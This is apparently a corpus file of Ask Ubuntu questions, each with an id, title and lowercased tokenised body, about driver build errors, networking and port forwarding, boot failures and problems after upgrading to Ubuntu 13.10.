rt2860_remove_one ) , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:88:29 : error : ‘rt2860_remove_one’ undeclared here ( not in a function ) remove : __devexit_p ( rt2860_remove_one ) , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:292:24 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ static int __devinit rt2860_probe ( ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:463:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ static void __devexit rt2860_remove_one ( ^ in file included from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/os/rt_linux.h:18:0 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_os.h:42 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_comm.h:56 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:32 : include/linux/module.h:87:32 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rt2860_pci_tbl’ extern const struct gtype # # _id __mod_ # # gtype # # _table \ ^ include/linux/module.h:145:3 : note : in expansion of macro ‘module_generic_table’ module_generic_table ( type # # _device , name ) ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:71:1 : note : in expansion of macro ‘module_device_table’ module_device_table ( pci , rt2860_pci_tbl ) ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.o ] errore 1 make [ 1 ] : *** [ _module_/home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux ] errore 2 make [ 1 ] : uscita dalla directory `` /usr/src/linux-headers-3.11.0-12-generic '' make : *** [ linux ] errore 2
360389	formatting a file to use it with fortune in the terminal	i have a big text file with 'terms ' and its 'definition ' separated by spaces ( variable ) . i want to use it in fortune cookie format . current file format : **term1** this is my definition with occasional ( < br > , / , e.g. , ; etc symbols ) and some are way longer **term2** this is my definition with occasional ( < br > , / , e.g. , ; etc symbols ) i want to transform it to the following format **term1** : this is my definition with occasional ( < br > , / , e.g. , ; etc symbols ) % **term2** : this is my definition with occasional ( < br > , / , e.g. , ; etc symbols ) % maybe with some sed or awk ( i 'm not good in either one ) please help .
360390	add routing to guest kvm 's	i have the following configured on my ubuntu host : virsh config for `` passthrough '' < network > < name > passthrough < /name > < uuid > 75a1b772-36ad-11e3-99dd-002590c04404 < /uuid > < forward mode='nat'/ > < bridge name='ptbr0 ' stp='on ' delay='0 ' / > < ip address='10.20.0.50 ' netmask='255.255.254.0 ' > < dhcp > < range start='10.20.0.51 ' end='10.20.0.75 ' / > < /dhcp > < /ip > < /network > and my /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.22.4.28 netmask 255.255.252.0 network 10.22.4.0 gateway 10.22.4.1 dns-nameserver 10.22.4.23 dns-search blackport.local auto eth1 iface eth1 inet manual auto ptbr0 iface ptbr0 inet static address 10.20.0.50 network 10.20.0.0 netmask 255.255.254.0 broadcast 10.20.0.255 gateway 10.20.0.1 bridge_ports eth1 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off so in other words , i have a 10.20.0.0/24 network , a 10.22.4.0/22 network , and the ubuntu host has a card dedicated to each network . i want the guest vm 's to hang out in 10.20.0 and be reachable from the 10.22.4 netowrk . my ptbr0 card comes up with the ipaddress 10.20.0.50 which is reachable from the 10.22.4 network . however , when my first kvm comes up with the address 10.20.0.56 , it is not reachable , with a `` destination port unreachable '' i tried to set up a route on the ubuntu host that pushed traffic to the ptbr0 device , but it did not work . what else can i try to make this happen ? thanks
360395	'multiple active partition '' error while booting ubuntu from usb	i made my usb ubuntu bootable using `` startup disk creator '' , but when i am trying to boot from this usb an error is coming `` multiple active partition '' . please help me out to solve this problem . steps what i did are as follows : - previously i had windows 8 and ubuntu 12.10 on my laptop , but i formatted my c drive to format both the os , and then created ubuntu 13.04 usb bootable from my friends laptop , now i am trying to boot my laptop but error is coming `` multiple active partition ''
360401	how to make my acer 5742g connect to network	i have installed ubuntu 13.10 on my acer it will not connect to wireless or wired network . very hard to copy paste output as i have no connection to the net from ubuntu the net work from my win7 and my phone and actually once when i booted from my stick `` try ubunyu '' it worked fine , so hw is ok but wired network will not connect and the wireless seems very hard any clues
360402	how to forward port to shared wired connection ?	i connect to my wireless network through networkmanager . in addition i have another computer connected to the first one through ethernet . i 'm using networkmanager to share the wireless connection of the first computer to the second one . here 's a diagram : internet | wireless router ( internal ip : 10.0.1.1 ) | ( wifi ) | computer 1 : wlan0 eth0 10.0.1.3 10.42.0.1 | computer 2 : eth0 10.42.0.48 this setup works ; computer 2 has internet access . additionally i can vnc or rdp from computer 1 to 2 . here 's iptables rules after the wired connection is shared by networkmanager : $ sudo iptables -nl chain input ( policy accept ) target prot opt source destination accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53 chain forward ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 10.42.0.0/24 state related , established accept all -- 10.42.0.0/24 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain output ( policy accept ) target prot opt source destination now i want to do some port forwarding so i can access the second computer from the wifi network ( 10.0.1 . * ) , for example vnc ( port 5900 ) . how can i do this ? ? thanks !
360404	brightness keys change display settings in ubuntu 13.04 ( hp pavilion g6 )	i have ubuntu 13.04 installed on my hp pavilion g6 notebook with amd radeon hd 7420g ( catalyst 13.4 ) . when i change brightness ( using f2/f3 keys or brightness & lock utility in ubuntu ) , in addition to changing brightness , it also changes display . for example : if i have a dual monitor connected , it cycles through display on laptop screen only , display on external monitor only , display on both monitors ( laptop screen on right , external monitor on left ) and so on . to do this , it also blacks out the entire screen for 2-3 seconds after which the new display configuration is loaded . note that this behavior also occurs if i do not have any external monitor connected . in this case , it simply reloads the existing configuration ( display on laptop screen only ) after a blackout of 2-3 seconds . how do i disable this behavior ?
360405	control runninig vlc instance with command line	so my actual goal is to enable global media keys to control vlc , as in - i 'd like to press `` next '' being in any window and i want vlc to go to next song . my idea is this : system settings - > keyboard - > shortcuts - > custom shortcuts , where i can add a custom shortcut and a command something like `` vlc next '' . my question is : how do i control a running ( graphic ) vlc instance with command line ?
360406	dash not working after upgrade to 13.10	after upgrading to 13.10 i 'm unable to use dash . nothing appears when i type something , i do n't see any icons or shortcuts . resetting unity does not help , the command is unavailable . what should i do ?
360407	13.10 and 12.04 discs say i have no windows 7 on my hard drive	i installed windows 7 on my new motherboard on a pc i built , and when i put in a ubuntu disc it tells me i have no operating systems installed when i do . i did n't encounter this problem on my laptop in the past before . did i somehow screw up on my part ?
360408	wicd wireless internet drop outs	i 'm using ubuntu 12.04 lts , and found that the network manager that comes with it gives me a really , really slow internet connection , so i changed to wicd through software centre . my problem now is that roughly every ten minutes i lose internet access . the wicd ui still says i am connected , but webpages do not load , downloads do not download etc etc sometimes the connection will come back after 30 seconds , some times i have to disconnect and reconnect to the router to get it back . none of these problems occurred when this machine was running windows , none of these problems are occurring to the other machines connected to the wireless router . any help would be appreciated .
360411	error while upgrading ubuntu 13.04 to ubuntu 13.10	when i tried to upgrade my current ubuntu system ( 13.04 ) to latest one ( 13.10 ) the upgrade aborted with these errors . failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/a/account-plugins/account-plugin-facebook_0.11+13.10.20130802-0ubuntu1_all.deb 403 forbidden failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/universe/t/tomboy/tomboy_1.15.2-1ubuntu1_amd64.deb 403 forbidden failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/u/unity-scope-tomboy/unity-scope-tomboy_0.1+13.10.20130723-0ubuntu1_all.deb 403 forbidden failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/f/friends/friends-facebook_0.2.0+13.10.20130926-0ubuntu1_all.deb 403 forbidden any suggestions ?
360412	black screen after upgrading from 13.04 to 13.10	just upgraded from 13.04 to 13.10 and all i got was a black screen . the hardware i 'm running is asus zenbook ux31a ( intel gpu ) . i do hear that the login screen drums do play , so the system does boot to login screen . when i try to boot using kernel 3.11.0-12 recovery mode , it tells me `` initctl : event failed '' . then if i go on an press ctrl+alt+f2 , log in and command startx , it dies because `` fatal server error : no screens found '' . here are some logs from /var/log/xorg.0.log http : //pastebin.com/zqasukjx kernel 3.8.0-31 work ok , as did things before the upgrade .
360413	upstart jobs and `` and '' conditions	i am trying to get an upstart job to start after both 2 other jobs have completed . as an example , i have debug.conf that looks like : start on stopped networking and stopped screen-cleanup task script date end script i have added a date call at the end of screen-cleanup.conf 's script , and at the beginning of networking 's post-stopped script as well . the time stamps should allow me to see roughly what order things were run in . i have rebooted several times now and the behaviour seems to be variable . initially i found that the above `` debug '' job would run after `` networking '' but before `` screen-cleanup '' had finished ( based on the date outputs ) . since then i have tried various tests and found that similar conditions , but dependent on signals i was sending via initctl emit ( to save me from having to reboot ) rather than `` stopped '' , work as expected . to explore the behaviour at boot more i have created and removed various test jobs and now i find that the `` debug '' job does not run at all . i copied the conf file to another name and changed the `` and '' to an `` or '' and verified that that job does fire twice on boot . i have looked at the cookbook but i ca n't see what i 'm doing wrong . screen-cleanup is a task as well , if that makes a difference ( its the file that came with the screen package apart from my additional call to date ) . i 'm running 13.10 though i 'm hoping for something that works back to 12.04 lts at worst . edit : and after more reboots i 'm back to the job triggering on the first thing to stop ( networking ) , rather than the last ( screen-cleanup ) . i can only assume there is an extra factor i 'm not noticing .
360414	nvidia optimus on 13.10 use initial support or bumblebee ?	after upgrading to 13.10 and reading this post : http : //www.webupd8.org/2013/08/using-nvidia-graphics-drivers-with.html im wondering if the `` initial optimus support '' from nvidia or the bumblebee soulution brings better performance . i didnt understand how the inital support works . as mentioned in the post , gtk2 theming in firefox seems to be broking somehow . does everyone have a quick info what is recommended right now with 13.10 ?
360415	upgrade to 13.10. from 13.04 - no boot to winxp	dual boot under 13.04 worked flawlessly , upgrade to 13.10 grub shows the windows xp system , windows logo appears for a second and then reboot to grub .
360416	latest kernel not working	once while i was using ubuntu everything locked up . i was no longer able to boot vmlinuz-3.8.0-31-generic . when i would try , it would not get past the boot phase . fortunately , i am still able to boot vmlinuz-3.8.0-30-generic and work normally . is there any way i can restore vmlinuz-3.8.0-31-generic to work again ? any ideas on what caused the problem or how to recover from it in the future ?
360417	init.d script problem	the init.d script is installed properly and by me i wrote the script correctly . but i have a very strange situation . the script executes a multi-threaded program written in c++ by me . if i execute the program through terminal ( i installed in /usr/sbin/ ) like : `` myprogram & '' everything is ok . but if this program is executed by the init.d script one thread fails . the other threads of the program as the other features of the init.d script specifications works as expected to . i also have to mention that the thread which fails makes a screenshot of the desktop every 30 sec . obviously the problem has to be from the init.d script . i tried to start the program in that script in the following ways : $ daemon & exec $ daemon & start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ daemon start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ daemon & start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ daemon & > /dev/null where $ pidfile = /var/run/ $ name.pid ; $ daemon = /usr/sbin/ $ name ; $ name = myprogram in all the cases i have the same result : one thread fails . any ideas ?
360420	do-release-upgrade crashed on unicodedecodeerror in decode ( ) while updateing to 13.10 from 13.04	i have just tried to upgrade to 13.10 from 13.04 and i have received the following error in console checking for a new ubuntu release authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' extracting 'saucy.tar.gz' traceback ( most recent call last ) : file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/saucy '' , line 10 , in < module > sys.exit ( main ( ) ) file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/distupgrade/distupgrademain.py '' , line 240 , in main save_system_state ( logdir ) file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/distupgrade/distupgrademain.py '' , line 133 , in save_system_state scrub_sources=true ) file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/distupgrade/apt_clone.py '' , line 149 , in save_state self._write_state_sources_list ( tar , scrub_sources ) file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/distupgrade/apt_clone.py '' , line 241 , in _write_state_sources_list `` ./etc/apt/sources.list.d/ '' +source ) file `` /tmp/user/0/ubuntu-release-upgrader-xnzjbd/distupgrade/apt_clone.py '' , line 246 , in _add_file_to_tar_with_password_check for line in f.readlines ( ) : file `` /usr/lib/python2.7/codecs.py '' , line 296 , in decode ( result , consumed ) = self._buffer_decode ( data , self.errors , final ) unicodedecodeerror : 'utf8 ' codec ca n't decode byte 0x9f in position 3 : invalid start byte this is in what i get in update-manager gui do-release-upgrade crashed on unicodedecodeerror in decode ( ) : 'utf8 ' codec ca n't decode byte 0x9f in position 3 : invalid state
360422	`kernel panic - not synicing : no init found` while installing any version of ubuntu	i tried to install ubuntu 13.10 however i 've got a problem : the live environment works fine , and the installation too . however when i try to boot the computer after installation it displays the purple screen , and nothing else . when i reboot the computer i get the following error : [ 0.958197 ] kernel panic - not synicing : no init found . try passing init= option to kernel . see linux documentation/init.txt for guideance . the things i tried to solve it : boot from recovery mode : the same error appears . different ways of partitioning ( also letting the installer figure out what to do ) : has no effect installing ubuntu 12.04 : again same problem as 13.10 doing a memtest : memory is okay . doing an fsck : everything is clean . i have both used 12.04 and 13.04 before on that computer and it worked fine .
360423	mouse cursor flickering and disappearing	i installed ubuntu today and since the first start up i have a problem with the mouse cursor . it starts randomly disappearing and flickering a lot . i have searched for a solution on google and here but did n't find anything .
360425	triple boot ( win7 , fedora19 , ubuntu 12.04 ) ubuntu grub unable to boot fedora up	i have installed windows 7 first , than installed fedora19 leaving grub in charge of the bootloader ( installed fedora as a standard partition , but did create separate standard partitions for all , i.e . home/root/boot etc . during the custom install ) may that be the problem ! ? then , i have installed ubuntu on the reset of the unallocated free space as a logical partition , just enabling a mount point for the `` / '' . obviously ubuntu grub handles the boot menu , and i can log into ubuntu and windows , but fedora freezes during boot up every time . i did mounted all the four fedora 's standard partitions in ubuntu 's nautilus and updated grub but still no luck . can someone please share a workaround this problem ? thanks
360426	ubuntu13.10 freezes upon dvd upgrade	i downloaded ubuntu 13.10 64-bit and burned it to a dvd . i put it in my pc and booted to it , i chose to upgrade ubuntu 13.10 . it just froze when setting up my software , it has been about an hour of it being frozen . should i hit the reset button and format my hard drive ? all of my files are backed up to ubuntu one .
360427	laptop screen does n't turn on after upgrade 13.10 from 13.04	i am using dual monitor but after update to 13.10 my laptop 's screen does n't turn on it 's always black , but the second monitor -the external one- is working properly . when i checked display setting i can see two monitors without any problem , they are detected.i also upgraded to ati driver to 13.11 beta to fix and i also switched my display server to mir , but all of these could n't helped me to fix problem .
360428	i am using g-pen f610 tablet on ubuntu 12.04 , and the pen is too sensitive , how to easy fix this ?	is there an easy way to lower the sensitivity of the pen pressure , i keep pressing and opening icons on the screen i do not wont to
360429	how to uninstall a particular dll from winetricks ?	have googled for this but could n't find a way to re-install riched20.dll i installed to install a windows application ( i do n't remember the application ) some days ago . is there anyway ( command-line or via the gui ) to remove and/or re-install dll 's installed in winetricks ? specifications : ubuntu 12.10 winetrics 20120912
360430	remove ubuntu from stand alone computer	i am new to ubuntu and made the mistake of removing windows 7 64-bit from my toshiba satellite p755d-s5172 , and only installed ubuntu 13.04 i believe from a jump drive . i want to remove ubuntu , install windows 7 , then reinstall ubuntu after . the issue i am having is when i load my windows install disk , or i put my flash drive with ubuntu installer on it , do a restart , and i can not enter my bios to choose where to load from . i have tried all the function keys and as well as many others , but all i get is a black screen when i hit a button . if i hit it again the screen goes back to the ubuntu loading screen . i may get a few lines of code that are checking pass/fail . but that is it ... any help on how to get into my bios would be grateful ! or how to remove ubuntu so i can reload windows thanks !
360432	how can i let the audio play trough multiple output channels in 13.10	i tried how can i change the default audio device from command line ? and play sound through two or more outputs/devices none of these work i have a hdmi and a onboard sound card i want them to play both at once so i can change volume on both devices easy they both work seperatly i use ubuntu gnome 13.10 does anyone else have an solution or am i not using pulseaudio ?
360434	best install route for a server ?	i have an old optiplex system which i want to use as an ftp and media server . i 'm wanting to get more into linux so i 'm wondering a few things would not running a gui allow more room for the cpu and gpu to focus on other things ? would i be able to set up a system where i have two ethernet controllers , and use them in a bridged mode ? ( like microsoft 's windows bridge mode ) i need to run telnet ( ssh ) , ftp ( vsftpd ) , transmission ( bit-torrent ) , subsonic , apache and serviio as well as a samba client for use with a media drive almost 1tb in size is all this doable from a command line perspective ... i know that i can set up ftp first to aid in setting up of different things such as configurations etc . i just need to know if it 's feasable thanks alot , sorry if i duplicated questions or w.e , i 'm new to this site .
360443	how can i remove a malformed line from my source.list ?	when trying to update , i end up getting , '' an unresolvable problem occurred while initializing the package information . please report this bug against the 'update manager ' package and include the following error message : 'e : malformed line 4 in source list /etc/apt/sources.list ( dist parse ) ' '' i am very new to the software , and i need help trying to find out hoe i can run this bug against the 'update manager . ' i tried running gksu gedit /etc/apt/sources.list in my terminal , but i get confused from here on out . help please !
360447	why my roommates ' connection to the internet is lost , when i 'm connected to our router on ubuntu ?	we have 4 computers in our flat . when i 'm starting to use ubuntu and when i 'm connected to our network , at least one of them has connection problems , that is , their connection status says that everything is fine , but they ca n't , for example , explore the internet or play online games . nothing like that happens when i 'm using windows . how to fix it ? my ubuntu version is 13.10
360449	pstree with terminal problem	i have a problem with ubuntu 13.10 terminal ( release version , not beta ) , for example , i created a c program that creates child processes in a mesh , the problem is that when i create a sequence of 3 or more sequency children and run the pstree command to show the tree mesh of processes , is not fit or something , cuts it with a `` + '' as there are more but do not fit . 3x3 mesh example : it should show the following ( in ubuntu 12.04 shows this ) : roberto @ rcanovas : - $ pstree -p | grep mash -gnome-terminal ( 2085 ) -+-bash ( 2116 ) -- -mash ( 2481 ) -+-mash ( 2482 ) -- -mash ( 2484 ) -- -mash ( 2487 ) |-mash ( 2483 ) -- -mash ( 2486 ) -- -mash ( 2489 ) `-mash ( 2485 ) -- -mash ( 2488 ) -- -mash ( 2490 ) however , it shows the following : roberto @ rcanovas : - $ pstree -p | grep mash -gnome-terminal ( 2085 ) -+-bash ( 2116 ) -- -mash5x5 ( 2481 ) -+-mash ( 2482 ) -- -mash ( 2484 ) -+ |-mash ( 2483 ) -- -mash ( 2486 ) -+ `-mash ( 2485 ) -- -mash ( 2487 ) -+ i tried with konsole and xterm and same result . can anyone help ? thank you very much .
360451	can not install ubuntu in dual boot with win7 ( asus ux51vz )	i removed win8 , changed partition table from gpt to mbr and installed win7 . the problem is that i do n't see the grub after i installed ubuntu and only win7 boots . any ideas ? i tried to reinstall all of listed above about 5 times but with no success : ( i tried both 13.04 and 13.10 my ssd contains 2 ( reserved+main ) ntfs primary partitions , and 2 ( / + /home ) ext4 extended partitions . secure boot disabled , csm enabled . upd : i also tried boot-repair and it installed the grub2 for me but unfortunately only with options to run ubuntu , so i repaired bootrecord using windows tools to have an ability to run to windows . anyway i still can not configure the dual boot . please help : )
360452	why does key-based ssh fail even after setting up the authorized_keys file on the remote host ?	these details do n't matter but i am on a ubuntu 12.04 machine and i want to ssh into my raspberrypi without a password . i followed the standard procedure for setting up ssh without a password : local $ ssh-keygen -t rsa ( hit enter for defaults to the questions ) local $ scp ~/.ssh/id_rsa.pub matt @ raspihost : ~/.ssh/authorized_keys i logged onto the raspihost and checked all my permissions on ~/.ssh/ and on the authorized_keys file itself . it was still not working !
360453	`` unknown file system . grub rescue '' wo n't let me access to bios	so i installed ubutu 13.04 alongside windows 8 and after a week or so it stopped working and i could n't figure out how to recover . i went back to windows for a little while and downloaded ubuntu 12.04 to install that version . as i could n't access the partition i had made for ubuntu , i formatted it and then made a bootable usb with the iso . i went to bios to change the boot settings from uefi and when i applied the changes it showed me `` unknown filesystem . grub rescue '' and wo n't let me access to bios to go back to windows and try to figure something out . any help is much appreciated .
360455	mouse flickering	i 've just done a fresh install of ubuntu 13.10 on my asus k53sv but i noticed that the cursor is flickering a lot and some times disappear . i never had this issue before with other ubuntu release . what can i do ?
360457	where can i download a dl 4000 chipset driver for 13.04	i would like to say thanks in advance for any and all help . i recently bought an aoc e1659fwu usb powered monitor . this monitor came with a cd/dvd which had drivers on it- but they were only for windows . i am currently running 13.04 ( raring ringtails ? ) . i 've googled around a lot and also asked aoc customer service and accoring to them , there are no drivers for me to download . i asked around a bit and the general feedback i 've been given is that linux has display drivers inherently . one person said that i should find out what chipset my monitor uses and try downloading the driver for that specific chipset . if that 's the best way to do it , then would anyone be able to help me locate where i can download a dl 4000 chipset driver please . if this is n't the best approach , would anyone be able to direct me down the right path . incase it 's relevant : my laptop is an asus n56v and i 'm currently dual booting windows 8 and ubuntu 13.04
360465	will upgrading windows 8 to 8.1 affect ubuntu ?	it 's a rather simple question ( i hope ) . i currently have windows 8 and i am dual booting it with ubuntu 13.04 . if i were to install the latest update for windows 8 , that being 8.1 , will it affect ubuntu or will there be any conflicts between the two ?
360466	ubuntu touch ( officially launched version ) : how to sync contacts	now that ubuntu touch was officially launched today ( 17th october 2013 ) : how do i sync ( upload to/download from ) my contacts , with my ubuntu touch os ?
360467	why am i not able to shutdown , log-off and restart after an upgrade to ubuntu 13.10 ?	after the update neither my desktop ( asus ) nor my laptop ( hp ) respond to the shut-down , log off or restart commands in the right top tool bar . how do i fix the issue ?
360472	ubuntu 13.10 unity does n't load after upgrade	just upgraded to ubuntu 13.10 only to find that unity wo n't load ( login freezes , after doing ctrl+alt+f1 , logging in and then doing startx , i get a blank desktop and the mouse pointer , and nothing else ) . i can right click , but the only operations that work are `` create new file '' and `` create new folder '' . for example , `` change desktop background '' does n't work . also , after doing a few right clicks and choosing `` change desktop background '' , i get a warning message box : `` compiz closed unexpectedly . '' guest login works fine . tried creating a new user , but i experience the same thing with the new user . tried removing all configuration files from my home directory ... same thing . doing dconf reset -f /org/compiz/ gives an error `` error spawning command line ... '' doing unity -- reset also gives errors . tried uninstalling unity ( and compiz ) and reinstalling , but that does n't help . tried reconfiguring lightdm , did n't help . i do n't have any proprietary drivers installed . once again , the funny thing is that the guest session works fine .
360474	how can i stop thunderbird adding strange characters ?	i use thunderbird 24.0 under ubuntu 11.04 . when i forward a message the character ă is added before an 's . so claire 's becomes claireă 's . also the spacing between paragraphs disappears . it makes the forwarded e-mail look messy and badly written . how can i correct this ?
360476	how to unplug/reset mini displayport in 12.04 in bash ?	i 'm running ubuntu 12.04 on a dell xps 15z laptop , and have connected an external display through the mini displayport . every time i boot , if the display is connected i have to unplug and plug it in again to get the settings to be what i want . otherwise my laptop screen and external are duplicated at the same resolution ( which they should n't be ) . is there a way to somehow disable and enable the displayport from the command line or in a bash script ? i 'd like to avoid having to keep unplugging and plugging in my monitor all the time .
360477	dropbox indicator menu went missing in 13.10 . how to get it back ?	i installed ubuntu 13.10 , then installed dropbox from ubuntu software center . yet starting dropbox seems to have no effect , and the dropbox icon does n't appear in the top-right indicator area like it normally does . dropbox is apparently running , but the indicator/menu does n't show up .
360478	do n't have network connection using a bcm4313 adapter	i just upgraded to ubuntu 13.10 , but since the upgrade i do n't have internet access via wifi anymore . i can : see networks connect to a network ping myself ( localhost , 192.168.0.103 ) i ca n't : ping others ( including other devices on the same wireless network , including the gateway/router ) resolve hosts access any other external resource , whether on my own network or on the internet using wireshark , i noticed my computer is continuously sending arp-requests like `` who has 192.168.0.1 [ which is the gateway ] ? tell 192.168.0.103 '' . it does n't get any replies though . when i ping another ip-address for which it knows the mac-address ( from cache ) , it turns out a packet loss of > 90 % occurs , and even if a packet manages to arrive it takes around 3000ms . the output of route -n is : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth1 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 eth1 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 before upgrading , wifi worked fine . using other devices , wifi still works fine.resetting the router did n't help . ethernet still works after upgrading . any suggestions ? update : i 'm using the wl driver . here 's the relevant output of some commands : lspci | grep wireless 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) cat /etc/modprobe.d/blacklist.conf [ ... ] blacklist mac80211 blacklist brcm80211 blacklist cfg80211 blacklist lib80211_crypt_tkip blacklist lib80211 blacklist b43 cat /etc/rc.local sudo modprobe -r lib80211 sudo insmod /lib/modules/3.2.0-30-generic-pae/kernel/net/wireless/lib80211.ko sudo insmod /lib/modules/3.2.0-30-generic-pae/kernel/net/wireless/lib80211_crypt_wep.ko sudo insmod /lib/modules/3.2.0-30-generic-pae/kernel/net/wireless/lib80211_crypt_tkip.ko sudo insmod /lib/modules/3.2.0-30-generic-pae/kernel/net/wireless/lib80211_crypt_ccmp.ko sudo modprobe wl exit 0 the last lines are probably how i got wireless working after the previous upgrade ( wireless has been a problem after each upgrade ) . update 2 : added information about the exact hardware below . the hardware is an integrated device , so i ran lspci -nn | grep -i network . the output is : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 )
360479	ubuntu on lenovo idepad s210 touch	i 'd like to buy lenovo ideapad s210 and install linux ( ubuntu ) on it . so i 'd like to ask if any of you have som experencie with running ubuntu on this notebook . getting touch screen work is not so important , i 'm more interested in installation ( is uefi a problem ? ) , if wifi , ethernet etc . work out of box and what is the battery life while running linux .
360480	restore problem on ubuntu phone ?	i install ubuntu phone on my nexus 4 and before i install i did one backup and after the installation i try to do the restore but the terminal show the next message '' now unlock your device and confirm the restore operation '' .
360484	how can i change partition ext4 boot options ?	i want to make boot-able to my user a partition called `` backup '' . my intention is keep here data . to be accessed with `` diskinternals linux reader '' on windows , and from my user on linux . however i can not copy nothing to there , because it is root access . i 've tried to use change user with chmod and then changed my fstab without success . this is my current partition scheme /dev/sda1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 3030-3030 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' cc70378a703779f2 '' type= '' ntfs '' /dev/sda3 : uuid= '' 647a12867a125560 '' type= '' ntfs '' /dev/sda5 : uuid= '' 4ef81902-d1db-4c95-9f01-135fd2a10e74 '' type= '' swap '' /dev/sda6 : uuid= '' 79f4d3e0-6c28-49f5-89fd-ed59b3ee2d65 '' type= '' ext4 '' /dev/sda7 : uuid= '' 86062610-219a-4f90-8c48-bf411c53938a '' type= '' ext4 '' my current fstab . # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=86062610-219a-4f90-8c48-bf411c53938a / ext4 errors=remount-ro 0 1 # /media/backup was on /dev/sda6 during installation uuid=79f4d3e0-6c28-49f5-89fd-ed59b3ee2d65 /media/backup ext4 defaults , uid=1000 , gid=1000 0 2 # /media/win7 was on /dev/sda3 during installation uuid=647a12867a125560 /media/win7 ntfs defaults , umask=007 , uid=1000 , gid=1000 0 0 # swap was on /dev/sda5 during installation uuid=4ef81902-d1db-4c95-9f01-135fd2a10e74 none swap sw 0 0
360485	adding to a file : /etc/udev/rules.d/51-android.rules	i am a complete n00bie , so please be gentle ... . i have just started using eclipse with the android adt setup and i attempting to set up a device for development . i have created the following file /etc/udev/rules.d/51-android.rules . the question is how do i add the device configuration information to the file via the command line as editing the file direct using gedit is not allowed due to permission issues . any help or advice very very welcome . many thanks in advance . ct
360488	upgrade from ubuntu 13.04 to 13.10 stuck at restoring previously installed packages	as the title says , i have tried to upgrade to ubuntu 13.10 by liveusb and the install has frozen at 'restoring previously installed packages ' . has been stuck at this point for almost 2 hours.. when i expand the terminal for the install details , nothing seems to be downloading ( which could cause this time delay ) and the only activity is from when i connected and disconnected from the wireless network.. any suggestions ?
360489	error when installing 13.10	it get to a purple screen with a man in a circle at the bottom then goes through a bunch wierd words and at bottom says this : can not open root device `` null '' or unknown block 0,0 please append a correct root/boot option kernal panic- not syncing : vfs : unable to mount root fs unknown block i downloaded using univeral usb installer should i have click format usb option when installing ubuntu onto the usb ? ? ? lol im haveing issue after issue : )
360491	sync thunderbird data wuth android	how can i sync thunderbird contacts and thunderbird calendar entries with my android handy ( samsung galaxy note ii ) ? in windows i have a tool called myphoneexplorer ( http : //www.fjsoft.at/en/ ) using this tool i can sync all data from outlook and also from thunderbird with my phone . i have calendar entries in google calendar but i also have some calendar entries on my outlook / thunderbird calendar . my contacts i only have in outlook / thunderbird . i do n't want to upload them all to google . how can i sync my data ?
360492	how can i get windows properties like with x with mir ?	i started work with mir and i have a one questions.. how i can work with all application ( get title , get active application and etc . ) with mir ? example in x11 first link and second link
